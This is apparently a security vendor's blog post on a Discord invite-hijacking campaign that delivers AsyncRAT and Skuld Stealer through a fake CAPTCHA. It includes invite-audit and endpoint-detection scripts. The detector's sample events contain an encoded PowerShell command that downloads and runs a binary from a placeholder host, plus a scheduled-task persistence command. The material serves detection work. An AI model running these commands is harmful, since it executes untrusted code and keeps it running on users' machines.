
Discord Invite Link Hijacking Unleashes AsyncRAT and Skuld Stealer on Crypto Wallets

Cybercriminals are exploiting a subtle vulnerability in Discord's invite system, hijacking expired and deleted invite links to redirect users to malicious servers. This sophisticated multi-stage attack delivers AsyncRAT and Skuld Stealer, primarily targeting cryptocurrency wallets and sensitive user data, highlighting a significant threat to Discord users.


Discord Invite Link Hijacking: A New Attack Vector

Recent investigations by Check Point Research have revealed a cunning new method employed by cybercriminals: the exploitation of Discord's invite link mechanism. Attackers are reclaiming expired or deleted Discord invite links, including custom "vanity" URLs and standard codes, to reroute unsuspecting users to their own malicious servers. This technique forms the initial stage of a complex multi-stage attack.

  • Exploiting Invite Reuse: When a temporary or custom invite link expires or is deleted, attackers can quickly register the same code for their own boosted Discord servers. This allows them to capitalize on the lingering trust associated with previously legitimate links shared across forums, social media, and official channels.

  • Types of Vulnerable Links:

      • Temporary Invite Links: Easily re-registered as vanity invites after expiration or deletion.

      • Custom Vanity Invite Links: Become available for re-registration if the original server loses its premium "Level 3 Boost" status.

      • Permanent Invite Links: Only conditionally vulnerable, namely if the link is deleted and its code is composed solely of lowercase letters and digits.
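The three observations above translate directly into an audit an organisation can run over the invite links it has published. The following is an added example written for this page, not Check Point's or Discord's code: it extracts the invite code from each link, checks whether a dead code could be re-registered as a vanity URL (only lowercase letters and digits, per the list above), and, for codes that still resolve, checks that they still point at the guild you originally shared. The live lookup assumes Discord's public invite endpoint (GET /api/v10/invites/{code}) is reachable; the sample links, guild IDs and the stub resolver are constructed so the script runs offline.

```python
"""Audit published Discord invite links for reuse and hijacking.

Added example, not the page's or any vendor's code. Statuses:
  malformed         - not a discord.gg / discord.com/invite URL
  dead              - code no longer resolves, cannot become a vanity URL
  dead-reclaimable  - code no longer resolves and is lowercase+digits only
  hijacked          - code resolves, but to a guild other than ours
  ok                - code resolves to our guild
"""
import json
import re
import urllib.request
from urllib.error import HTTPError
from typing import Callable, Optional

INVITE_RE = re.compile(
    r"^(?:https?://)?(?:www\.)?"
    r"(?:discord\.gg|discord(?:app)?\.com/invite)/([A-Za-z0-9]+)/?$"
)
# Per the page: only codes made solely of lowercase letters and digits can be
# registered as a vanity URL, so only those can be reclaimed by an attacker.
VANITY_ELIGIBLE_RE = re.compile(r"^[a-z0-9]+$")


def extract_code(link: str) -> Optional[str]:
    """Pull the invite code out of a discord.gg or discord.com/invite URL."""
    m = INVITE_RE.match(link.strip())
    return m.group(1) if m else None


def is_vanity_eligible(code: str) -> bool:
    """True if an expired/deleted code could be re-registered as a vanity URL."""
    return bool(VANITY_ELIGIBLE_RE.match(code))


def resolve_via_api(code: str) -> Optional[dict]:
    """Look an invite up with Discord's public invite endpoint (assumption:
    reachable and unauthenticated for public invites). None means the code
    is unknown (HTTP 404, Discord's "Unknown Invite")."""
    req = urllib.request.Request(
        f"https://discord.com/api/v10/invites/{code}",
        headers={"User-Agent": "invite-audit/1.0"},
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return json.load(resp)
    except HTTPError as e:
        if e.code == 404:
            return None
        raise


def audit(links, expected_guild_id: str,
          resolve: Callable[[str], Optional[dict]] = resolve_via_api):
    """Classify every link with one of the statuses in the module docstring."""
    report = []
    for link in links:
        code = extract_code(link)
        if code is None:
            report.append({"link": link, "code": None, "status": "malformed"})
            continue
        info = resolve(code)
        if info is None:
            status = "dead-reclaimable" if is_vanity_eligible(code) else "dead"
        elif info.get("guild", {}).get("id") != expected_guild_id:
            status = "hijacked"   # live, but no longer our server
        else:
            status = "ok"
        report.append({"link": link, "code": code, "status": status,
                       "guild": info.get("guild", {}).get("name") if info else None})
    return report


# Constructed sample data for an offline run: links we once published, and a
# stub standing in for the Discord API (the guild IDs and names are made up).
OUR_GUILD = "111111111111111111"
SAMPLE_LINKS = [
    "https://discord.gg/ourcommunity",     # our vanity URL, still ours
    "https://discord.com/invite/aB3xQ9",   # expired temp code, has uppercase
    "discord.gg/xk7pq2m",                  # expired temp code, reclaimable
    "https://discord.gg/devhub",           # old vanity URL, now someone else's
    "https://example.com/join",            # not a Discord invite at all
]
_STUB = {
    "ourcommunity": {"guild": {"id": OUR_GUILD, "name": "Our Community"}},
    "devhub": {"guild": {"id": "999999999999999999", "name": "Dev Hub Verify"}},
}


def stub_resolve(code: str) -> Optional[dict]:
    return _STUB.get(code)


if __name__ == "__main__":
    for row in audit(SAMPLE_LINKS, OUR_GUILD, stub_resolve):
        print(row)
```

Run it against the real API by calling `audit(links, guild_id)` without the stub; a `hijacked` result is the case the article describes, where the link still works but lands users on an attacker's server, and a `dead-reclaimable` result is a link you should stop circulating before someone else registers it.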

The Deceptive Infection Chain

Once users join a hijacked Discord server, they are typically directed to a "verify" channel. Here, a fake bot, such as "Safeguard#0786," prompts them to complete a "verification" step, which involves authorizing the bot and being redirected to an external phishing site.

This phishing page mimics Discord's user interface and employs a social engineering technique known as "ClickFix." A fake Google CAPTCHA appears to fail, instructing users to manually paste and execute a pre-loaded PowerShell command. This command initiates the multi-stage malware delivery process:

  1. PowerShell Execution: The PowerShell script downloads and executes a first-stage downloader (installer.exe) from GitHub.

  2. Multi-Stage Loaders: The installer.exe then retrieves subsequent encrypted payloads from Bitbucket.

  3. Persistence and Evasion: The malware establishes persistence through scheduled tasks, running every five minutes, and employs obfuscation and sandbox evasion techniques to delay execution and avoid detection.
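The chain above, and the endpoint-detection advice under Mitigation below, can be turned into concrete detection logic. The following is an added example written for this page, not Check Point's or any vendor's detection content. It runs three rules over process-creation telemetry in the shape of Sysmon Event ID 1 records: PowerShell launched by the Explorer shell (which is what a Run-dialog paste, the ClickFix step, looks like to an EDR) with download-cradle or hidden-window options, including options hidden inside an -EncodedCommand payload; a binary under the user's profile executed by that PowerShell, matching the installer.exe stage; and a schtasks /create with a minute-level repeat interval, matching the five-minute persistence task. The sample events, host paths, and the repeat-interval threshold are constructed assumptions.

```python
"""Detect the ClickFix -> dropped loader -> frequent scheduled task sequence.

Added example, not the page's code. Input: Sysmon-style Event ID 1 dicts
(Image, ParentImage, CommandLine, ProcessId). Thresholds are assumptions.
"""
import base64
import re
from typing import Dict, List, Tuple

CRADLE_MARKERS = (
    "invoke-webrequest", "iwr ", "downloadstring", "downloadfile",
    "invoke-expression", "iex ", "iex(", "-w hidden", "-windowstyle hidden",
    "-nop", "-noprofile", "bypass",
)
# -e / -ec / -enc / -encodedcommand followed by the base64 payload
ENC_RE = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
MINUTE_TASK_RE = re.compile(r"(?i)/sc\s+minute(?:.*?/mo\s+(\d+))?")
USER_DROP_RE = re.compile(r"(?i)\\users\\[^\\]+\\(appdata|downloads|temp)\\")
REPEAT_MINUTES_MAX = 10   # assumption: repeats this frequent deserve review


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def expand_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so the
    same string checks see markers hidden inside it."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return f"{cmdline} {decoded}"


def clickfix_powershell(ev: Dict) -> bool:
    """Rule A: explorer.exe -> powershell with at least two cradle/hiding markers."""
    if _basename(ev["Image"]) not in ("powershell.exe", "pwsh.exe"):
        return False
    if _basename(ev["ParentImage"]) != "explorer.exe":
        return False
    cmd = expand_command(ev["CommandLine"]).lower()
    return sum(marker in cmd for marker in CRADLE_MARKERS) >= 2


def dropped_binary(ev: Dict) -> bool:
    """Rule B: PowerShell executing something from the user's profile."""
    return (_basename(ev["ParentImage"]) in ("powershell.exe", "pwsh.exe")
            and bool(USER_DROP_RE.search(ev["Image"])))


def frequent_task(ev: Dict) -> bool:
    """Rule C: schtasks /create on a minute schedule at or under the threshold."""
    if _basename(ev["Image"]) != "schtasks.exe":
        return False
    cmd = ev["CommandLine"]
    if "/create" not in cmd.lower():
        return False
    m = MINUTE_TASK_RE.search(cmd)
    if not m:
        return False
    interval = int(m.group(1)) if m.group(1) else 1   # /mo defaults to 1
    return interval <= REPEAT_MINUTES_MAX


RULES = {"clickfix_powershell": clickfix_powershell,
         "dropped_binary_from_powershell": dropped_binary,
         "frequent_scheduled_task": frequent_task}


def detect(events: List[Dict]) -> List[Tuple[str, int]]:
    """Return (rule name, ProcessId) for every event that trips a rule."""
    return [(name, ev["ProcessId"]) for ev in events
            for name, rule in RULES.items() if rule(ev)]


# Constructed sample telemetry: hostnames, paths and payload text are made up.
_ENC = base64.b64encode(
    ("iwr https://example.invalid/installer.exe -OutFile $env:TEMP\\installer.exe; "
     "& $env:TEMP\\installer.exe").encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 4012, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell -w hidden -ep bypass -enc {_ENC}"},
    {"ProcessId": 4020, "Image": r"C:\Users\alice\AppData\Local\Temp\installer.exe",
     "ParentImage": PS, "CommandLine": r"C:\Users\alice\AppData\Local\Temp\installer.exe"},
    {"ProcessId": 4031, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\installer.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 5 /tn Updater /tr "C:\Users\alice\AppData\Local\Temp\installer.exe" /f'},
    # benign: an admin running a script from a console, not from the shell
    {"ProcessId": 5100, "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -NoProfile -File C:\ops\inventory.ps1"},
    # benign: a nightly task
    {"ProcessId": 5101, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"schtasks /create /sc daily /st 02:00 /tn Backup /tr C:\ops\backup.cmd"},
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

Rule A keys on the parent being explorer.exe because that is what a user pasting into the Run dialog produces, which is precisely the ClickFix behaviour; a console-launched admin script with the same switches does not trip it, and the marker count keeps a lone `-NoProfile` from firing. The three rules firing on one host in sequence is the signal worth escalating.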

Malicious Payloads: AsyncRAT and Skuld Stealer

The campaign primarily delivers two potent malware payloads:

  • AsyncRAT: An open-source Remote Access Trojan (RAT) that grants attackers full control over the victim's machine, enabling command execution, keylogging, and file manipulation.

  • Skuld Stealer: A customized information-stealing malware specifically designed to target:

      • Browser credentials

      • Discord tokens

      • Cryptocurrency wallets (Exodus and Atomic)

Skuld Stealer injects malicious JavaScript into legitimate wallet applications, stealing seed phrases and passwords, and exfiltrates this sensitive data via Discord webhooks. The attackers have also adapted tools like ChromeKatz to bypass Chrome's Application-Bound Encryption (ABE), allowing them to steal cookies directly from browser memory.

Mitigation and Ongoing Threat

This campaign underscores how seemingly minor platform features can be weaponized. The use of trusted services like Discord, GitHub, Bitbucket, and Pastebin helps the malicious traffic blend in with normal network activity, making detection challenging. While Discord has taken action against specific malicious bots, the underlying vulnerability in invite link management remains a concern.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Users are advised to:

  • Use permanent invite links whenever possible, and avoid deleting them once they have been widely shared, since a deleted permanent link whose code is all lowercase letters and digits can be re-registered as a vanity URL.

  • Regularly check and update shared invites.

  • Be wary of "verification" prompts and unauthorized bot interactions.

  • Deploy robust endpoint protection solutions capable of detecting multi-stage malware and suspicious PowerShell activity.

The campaign has impacted over 1,300 potential victims across various countries, including the United States, Vietnam, France, Germany, and the United Kingdom, with a clear financial motivation targeting cryptocurrency users.

Sources

  • Cybercriminals Exploiting Expired Discord Invite Links to Deploy Multi-Stage Malware, GBHackers News.

  • Threat Actors Exploiting Expired Discord Invite Links to Deliver Multi-Stage Malware, CybersecurityNews.

  • The Discord Invite Loop Hole Hijacked for Attacks, Check Point Software.

  • Hijacked Discord Leads to AsyncRAT and Skuld Stealer Infections, TechNadu.

  • Hackers Compromise Discord Invite to Inject Malicious Links Delivering AsyncRAT, GBHackers News.
